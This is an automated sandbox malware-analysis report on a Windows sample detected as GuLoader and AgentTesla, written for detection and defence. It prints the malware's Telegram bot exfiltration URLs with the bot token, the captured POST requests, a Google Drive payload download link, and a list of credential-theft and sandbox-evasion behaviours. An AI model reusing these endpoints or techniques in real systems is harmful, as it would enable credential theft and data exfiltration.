Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Transferencia.exe

Overview

General Information

Sample Name:Transferencia.exe
Analysis ID:624276
MD5:fb1d131568bdd2fa951608534f83a75c
SHA1:ff02df2cb07c221b8ed3583c6dafb8c0e35684f8
SHA256:42625067621ac2dba6b95e565a48454637f46185356034da214a00a3d453c971
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • Transferencia.exe (PID: 6500 cmdline: "C:\Users\user\Desktop\Transferencia.exe" MD5: FB1D131568BDD2FA951608534F83A75C)
    • CasPol.exe (PID: 4560 cmdline: "C:\Users\user\Desktop\Transferencia.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 5276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"Exfil Mode": "Telegram", "Chat id": "5333980955", "Chat URL": "https://api.telegram.org/bot5288820614:AAG-hyM7vecg27FJtsAvcRgnrHDk77cGPCc/sendDocument"}
{"Payload URL": "https://drive.google.com/uc?export=download&id=1hB?$1A"}
{"C2 url": "https://api.telegram.org/bot5288820614:AAG-hyM7vecg27FJtsAvcRgnrHDk77cGPCc/sendMessage"}
SourceRuleDescriptionAuthorStrings
00000009.00000000.100478953847.0000000001350000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000002.00000002.100639341995.0000000002FD0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 3 entries
            No Sigma rule has matched
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000009.00000000.100478953847.0000000001350000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1hB?$1A"}
            Source: Transferencia.exe.6500.2.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "5333980955", "Chat URL": "https://api.telegram.org/bot5288820614:AAG-hyM7vecg27FJtsAvcRgnrHDk77cGPCc/sendDocument"}
            Source: CasPol.exe.4560.9.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5288820614:AAG-hyM7vecg27FJtsAvcRgnrHDk77cGPCc/sendMessage"}
            Source: Transferencia.exeReversingLabs: Detection: 26%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_20DC9220 CryptUnprotectData,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_20DC9A1F CryptUnprotectData,
            Source: Transferencia.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 216.58.212.142:443 -> 192.168.11.20:49770 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.18.97:443 -> 192.168.11.20:49771 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49776 version: TLS 1.2
            Source: Transferencia.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_00406850 FindFirstFileW,FindClose,
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_0040290B FindFirstFileW,

            Networking

            barindex
            Source: unknownDNS query: name: api.telegram.org
            Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1hB?$1A
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: POST /bot5288820614:AAG-hyM7vecg27FJtsAvcRgnrHDk77cGPCc/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da3355f7c6849eHost: api.telegram.orgContent-Length: 1033Expect: 100-continueConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot5288820614:AAG-hyM7vecg27FJtsAvcRgnrHDk77cGPCc/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da33572e228161Host: api.telegram.orgContent-Length: 21529Expect: 100-continue
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1hBPij_FbvgapJ-GfS2ATEfZikBmSe_Fv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v0f0106r562t78j67kq2fi8o6al2mrn8/1652268450000/12299294031038466182/*/1hBPij_FbvgapJ-GfS2ATEfZikBmSe_Fv?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-1o-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 00000009.00000002.105255896038.000000001DBBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: CasPol.exe, 00000009.00000002.105256772800.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.100760335724.0000000020B01000.00000004.00000800.00020000.00000000.sdmp, Cookies.9.drString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
            Source: Cookies.9.drString found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
            Source: CasPol.exe, 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
            Source: CasPol.exe, 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://EawggF.com
            Source: CasPol.exe, 00000009.00000002.105256553167.000000001DC2F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105257172459.000000001DCA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: CasPol.exe, 00000009.00000003.100609667357.000000000159D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.100614361859.000000000159D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.100610154370.000000000159D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105232709028.0000000001586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: CasPol.exe, 00000009.00000003.100609667357.000000000159D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.100614361859.000000000159D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.100610154370.000000000159D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105232709028.0000000001586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: CasPol.exe, 00000009.00000002.105256389496.000000001DC15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nRQMtDNYU5cYJ.net
            Source: Transferencia.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: CasPol.exe, 00000009.00000002.105256438921.000000001DC1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: CasPol.exe, 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%%startupfolder%
            Source: CasPol.exe, 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%t-
            Source: CasPol.exe, 00000009.00000002.105256438921.000000001DC1B000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105257088442.000000001DC88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: CasPol.exe, 00000009.00000002.105232709028.0000000001586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/
            Source: CasPol.exe, 00000009.00000002.105256438921.000000001DC1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5288820614:AAG-hyM7vecg27FJtsAvcRgnrHDk77cGPCc/sendDocument
            Source: CasPol.exe, 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5288820614:AAG-hyM7vecg27FJtsAvcRgnrHDk77cGPCc/sendDocumentdocument-----
            Source: CasPol.exe, 00000009.00000003.100609667357.000000000159D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.100610154370.000000000159D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105232397396.0000000001567000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external
            Source: CasPol.exe, 00000009.00000002.105232595181.000000000157C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-04-1o-docs.googleusercontent.com/
            Source: CasPol.exe, 00000009.00000003.100609667357.000000000159D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.100614274320.0000000001593000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.100610154370.000000000159D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105232709028.0000000001586000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105232397396.0000000001567000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-04-1o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v0f0106r
            Source: CasPol.exe, 00000009.00000002.105231609654.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: CasPol.exe, 00000009.00000002.105232101362.0000000001546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1hBPij_FbvgapJ-GfS2ATEfZikBmSe_Fv
            Source: CasPol.exe, 00000009.00000002.105232101362.0000000001546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1hBPij_FbvgapJ-GfS2ATEfZikBmSe_Fv(
            Source: CasPol.exe, 00000009.00000002.105255313107.000000001DB43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: CasPol.exe, 00000009.00000002.105261137084.000000001E042000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105255313107.000000001DB43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
            Source: CasPol.exe, 00000009.00000002.105261137084.000000001E042000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105255313107.000000001DB43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: CasPol.exe, 00000009.00000002.105261137084.000000001E042000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105255313107.000000001DB43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
            Source: CasPol.exe, 00000009.00000002.105255313107.000000001DB43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: CasPol.exe, 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
            Source: unknownHTTP traffic detected: POST /bot5288820614:AAG-hyM7vecg27FJtsAvcRgnrHDk77cGPCc/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da3355f7c6849eHost: api.telegram.orgContent-Length: 1033Expect: 100-continueConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1hBPij_FbvgapJ-GfS2ATEfZikBmSe_Fv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v0f0106r562t78j67kq2fi8o6al2mrn8/1652268450000/12299294031038466182/*/1hBPij_FbvgapJ-GfS2ATEfZikBmSe_Fv?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-1o-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 216.58.212.142:443 -> 192.168.11.20:49770 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.18.97:443 -> 192.168.11.20:49771 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49776 version: TLS 1.2
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_004056BB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,
            Source: Transferencia.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_700D1BFF
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FF4AA5
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FF7038
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FE5D23
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FE9EE9
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FF5AD4
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FE92BE
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FF5EA6
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FECC9E
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FE927C
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FECE76
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FEA06A
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FE9E60
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FE4846
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FF763F
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FF5432
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FF402B
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FE9E19
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FE8A0C
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FECC09
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FE9801
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FF43E5
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FECDBF
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FF57B8
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FE9FAE
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FECBA6
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FE9382
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FECB76
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FECD37
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FE4D2B
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FEA121
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FED71E
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FECB01
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_1D8A6B62
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_1D8AA160
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_1D8A9890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_1D8A9548
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_20DCE2C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_20DC6248
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_20DC16F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_20DC1FD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_20DC6A98
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_20DC6A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_20DCA558
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_20E45180
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_20E4A438
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_20E40710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 1D8AD148 appears 53 times
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FF4AA5 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FF7038 NtResumeThread,
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_02FF6A35 NtProtectVirtualMemory,
            Source: Transferencia.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\Transferencia.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dll
            Source: Transferencia.exeStatic PE information: invalid certificate
            Source: Transferencia.exeReversingLabs: Detection: 26%
            Source: C:\Users\user\Desktop\Transferencia.exeFile read: C:\Users\user\Desktop\Transferencia.exeJump to behavior
            Source: Transferencia.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Transferencia.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\Transferencia.exe "C:\Users\user\Desktop\Transferencia.exe"
            Source: C:\Users\user\Desktop\Transferencia.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Transferencia.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Transferencia.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Transferencia.exe"
            Source: C:\Users\user\Desktop\Transferencia.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile created: C:\Users\user\AppData\Roaming\jbhc2jzl.aupJump to behavior
            Source: C:\Users\user\Desktop\Transferencia.exeFile created: C:\Users\user\AppData\Local\Temp\nsy4B54.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/6@3/3
            Source: C:\Users\user\Desktop\Transferencia.exeCode function: 2_2_004021AA CoCreateInstance,
            Source: C:\Users\user\Desktop\Transferencia.exeFile read: C:\Users\desktop.iniJump to behavior
